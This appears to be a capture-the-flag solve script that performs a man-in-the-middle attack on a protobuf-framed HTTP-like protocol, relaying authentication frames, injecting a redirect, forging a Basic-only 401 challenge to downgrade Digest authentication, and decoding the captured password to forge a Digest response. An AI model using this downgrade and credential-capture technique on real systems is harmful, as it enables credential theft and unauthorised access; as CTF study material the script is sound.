#!/usr/bin/python
# CTF{golang_reversing_can_eat_my_balls_and_so_can_protocol_buffers}
try:
import hashlib as md5
except ImportError:
import md5
import random
import types
import dicks
import sys
import base64
import opabina_pb2
import struct
import socket
import ssl
# TEST BUILDING AUTH CHALLENGE
# TEST_AUTHSTRING = "Digest realm=\"testrealm@host.com\",qop=\"auth\",nonce=\"dd3b173f21ae8266\",opaque=\"dd3b173f21ae8266\""
# HERPADERP
#partial_digest = dicks.calculate_partial_digest("google.ctf","In the realm of hackers","1932403934.1443610966.703716842")
#request_digest = dicks.calculate_request_digest("GET",partial_digest,uri="/protected/secret",nonce="dcd98b7102dd2f0e8b11d0f600bfb0c093",nonce_count=1,client_nonce="0a4f113b")
#print request_digest
#print "6629fae49393a05397450978507c4ef1"
# print "DW ABOUT THE ABOVE JUST TESTING LOL"
partial_digest = ""
request_digest = ""
HOST = "ssl-added-and-removed-here.ctfcompetition.com"
PORT = 13001

# Plain TCP socket with a 10 s timeout on every blocking call, TLS on top.
# NOTE: ssl.wrap_socket() with default arguments does not verify the server
# certificate (cert_reqs defaults to CERT_NONE) and performs no hostname
# check, so the peer is unauthenticated even though the traffic is encrypted.
endpoint = (HOST, PORT)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(10)
wrappedSocket = ssl.wrap_socket(sock)
wrappedSocket.connect(endpoint)
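def nice_recv(ws):
    """Receive one length-prefixed Exchange frame from *ws* and return it.

    Wire format (the one nice_send writes): a 4-byte little-endian signed
    length followed by exactly that many bytes of serialized Exchange.

    Args:
        ws: a connected socket-like object exposing ``recv``.

    Returns:
        The parsed ``opabina_pb2.Exchange``; it is also printed to stdout.

    Raises:
        EOFError: the peer closed the connection before a full frame arrived.
        ValueError: the length prefix is negative.
    """
    header = _recv_exact(ws, 4)
    (length,) = struct.unpack("<i", header)
    # The length is peer-controlled; a negative value would otherwise be
    # passed on as a nonsensical read size.
    if length < 0:
        raise ValueError("negative frame length %d" % length)
    body = _recv_exact(ws, length)
    pb = opabina_pb2.Exchange()
    pb.ParseFromString(body)
    print(pb)
    return pb


def _recv_exact(ws, n):
    """Read exactly *n* bytes from *ws*, looping over short reads.

    A single recv(1024) may return fewer bytes than the frame holds (or
    more than one frame's worth); reading the header and body to their
    exact sizes keeps the stream in sync. Reads are issued in bounded
    chunks so a large peer-supplied length does not turn into one huge
    allocation up front.

    Raises:
        EOFError: the connection closed with bytes still outstanding.
    """
    chunks = []
    remaining = n
    while remaining > 0:
        chunk = ws.recv(min(remaining, 65536))
        if not chunk:
            raise EOFError("connection closed with %d bytes outstanding" % remaining)
        chunks.append(chunk)
        remaining -= len(chunk)
    return b"".join(chunks)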
# d = wrappedSocket.recv(1024)
# print d
# length_marshalled = struct.unpack("<i",d[0:4])
# print length_marshalled
# pb = opabina_pb2.Exchange()
# pb.ParseFromString(d[4:])
# print "-- RECEIVED %d --" % len(d)
# rint pb
# Read and print the peer's first frame; the parsed message is not kept.
nice_recv(wrappedSocket)
print("-- CREATING RESPONSE --")
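def nice_send(s, data):
    """Serialize *data* and send it over *s* as one length-prefixed frame.

    Wire format: a 4-byte little-endian signed length, then the serialized
    message bytes (the layout nice_recv expects).

    Args:
        s: a connected socket-like object exposing ``sendall``.
        data: a protobuf message exposing ``SerializeToString``.
    """
    payload = data.SerializeToString()
    frame = struct.pack("<i", len(payload)) + payload
    # sendall() loops until every byte is written; a bare send() may return
    # after a partial write and silently truncate the frame on the wire.
    s.sendall(frame)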
def _relay(ws):
    """Read one frame from *ws* and send it straight back; return it.

    Used for the steps where this script passes a message through unchanged.
    """
    msg = nice_recv(ws)
    nice_send(ws, msg)
    return msg


# Step 1: request /protected/not-secret with a single User-Agent header.
pb = opabina_pb2.Exchange()
pb.request.ver = 0
pb.request.uri = "/protected/not-secret"
h = pb.request.headers.add()
h.key = "User-Agent"
h.value = "opabina-regalis.go"
print("SENDING SERVER REQUEST FOR /PROTECTED/NOT-SECRET")
nice_send(wrappedSocket, pb)

# Step 2: pass the next two frames through unchanged, logging each one.
print("RECEIVING....")
pb = nice_recv(wrappedSocket)
print("FORWARDING SERVER->CLIENT AUTHENTICATION REQUEST...")
nice_send(wrappedSocket, pb)
pb = nice_recv(wrappedSocket)
print("FORWARDING CLIENT->SERVER AUTHENTICATION REQUEST...")
nice_send(wrappedSocket, pb)
pb = nice_recv(wrappedSocket)
print("THIS ISNT THE TOKEN YOURE LOOKING FOR...")

# Step 3: answer with a 302 whose Location is /protected/secret.
pb = opabina_pb2.Exchange()
pb.reply.status = 302
h = pb.reply.headers.add()
h.key = "Location"
h.value = "/protected/secret"
print("REDIRECTING USER TO /PROTECTED/SECRET, YOU SHOULD SEE A GET REQUEST...")
nice_send(wrappedSocket, pb)

# Step 4: relay the following frames, read one more, then exit.
# sys.exit(0) ends the process here without closing the socket, and every
# statement after it in this file is unreachable.
pb = _relay(wrappedSocket)
print("AUTH REQUEST NEXT?")
pb = _relay(wrappedSocket)
pb = _relay(wrappedSocket)
pb = nice_recv(wrappedSocket)
sys.exit(0)
import re

# Unreachable in the script as written: sys.exit(0) earlier in the file
# ends the process before this point. Kept as the author left it.
# Pull the server nonce out of a Digest challenge, if one was received.
rnonce = ""
request_digest = ""
for h in pb.reply.headers:
    if h.key != "WWW-Authenticate":
        continue
    print("+++ DIGEST AUTH: %s" % h.value)
    m = re.search("nonce=\"(.+?)\"", h.value)
    # re.search yields None when there is no nonce= field; m.groups then
    # raises AttributeError (there is no guard here).
    print("+++ MATCH: %s" % m.groups(0))
    (rnoncex,) = m.groups(0)
    rnonce = rnoncex
# Unreachable in the script as written: sys.exit(0) earlier in the file
# ends the process before this point. Kept as the author left it.
print("-- DOWNGRADING TO FORCE BASIC HEADER")
# A 401 whose WWW-Authenticate offers only Basic. Basic credentials are
# base64-encoded rather than hashed, which is why a client accepting a
# weaker challenge than it was first offered is a risk worth defending
# against on the client side.
pb = opabina_pb2.Exchange()
pb.reply.status = 401
for key, value in (
    ("Server", "opabina-regalis.go"),
    ("Location", "/protected/secret"),
    ("WWW-Authenticate", "Basic realm=\"In the realm of hackers\""),
):
    hdr = pb.reply.headers.add()
    hdr.key = key
    hdr.value = value
nice_send(wrappedSocket, pb)

print("RECEIVING....")
# Inline receive using the same framing as nice_recv (4-byte little-endian
# length, then the serialized Exchange); only the first 1024 bytes are read.
d = wrappedSocket.recv(1024)
length_marshalled = struct.unpack("<i", d[0:4])
print(length_marshalled)
del pb
pb = opabina_pb2.Exchange()
pb.ParseFromString(d[4:])
print(pb)
# Unreachable in the script as written: sys.exit(0) earlier in the file
# ends the process before this point. Kept as the author left it.
# Decode the Basic Authorization header ("Basic <base64(user:pw)>") and
# print the credentials it carries.
for h in pb.request.headers:
    if h.key != "Authorization":
        continue
    b = h.value
    basic, authb64 = b.split(" ")
    user, pw = base64.b64decode(authb64).split(":")
    print("USER:%s PW:%s" % (user, pw))
# NOTE: pw is only bound when an Authorization header was present; with
# none, the next line raises NameError.
partial_digest = dicks.calculate_partial_digest("google.ctf", "In the realm of hackers", pw)
request_digest = dicks.calculate_request_digest(
    "GET",
    partial_digest,
    uri="/protected/secret",
    nonce=rnonce,
    nonce_count=1,
    client_nonce="0a4f113b",
)
# Unreachable in the script as written: sys.exit(0) earlier in the file
# ends the process before this point. Kept as the author left it.
print("-- REPLYING WITH AUTHENTICATION VALUE --")
pb = opabina_pb2.Exchange()
pb.request.ver = 0
pb.request.uri = "/protected/secret"
h = pb.request.headers.add()
h.key = "User-Agent"
h.value = "opabina-regalis.go"
h_auth = pb.request.headers.add()
h_auth.key = "Authorization"
# Digest header fields, joined with "," and no spaces. NOTE(review): the
# opaque field is filled with the response digest rather than an opaque
# value from the server challenge; this looks unintentional -- verify.
digest_fields = [
    'username="google.ctf"',
    'realm="In the realm of hackers"',
    'nonce="%s"' % rnonce,
    'uri="/protected/secret"',
    "qop=auth",
    "nc=00000001",
    'cnonce="0a4f113b"',
    'response="%s"' % request_digest,
    'opaque="%s"' % request_digest,
]
h_auth.value = "Digest " + ",".join(digest_fields)
print(pb)
nice_send(wrappedSocket, pb)

print("RECEIVING....")
# Inline receive using the same framing as nice_recv; only the first
# 1024 bytes are read.
d = wrappedSocket.recv(1024)
length_marshalled = struct.unpack("<i", d[0:4])
print(length_marshalled)
del pb
pb = opabina_pb2.Exchange()
pb.ParseFromString(d[4:])
print(pb)
wrappedSocket.close()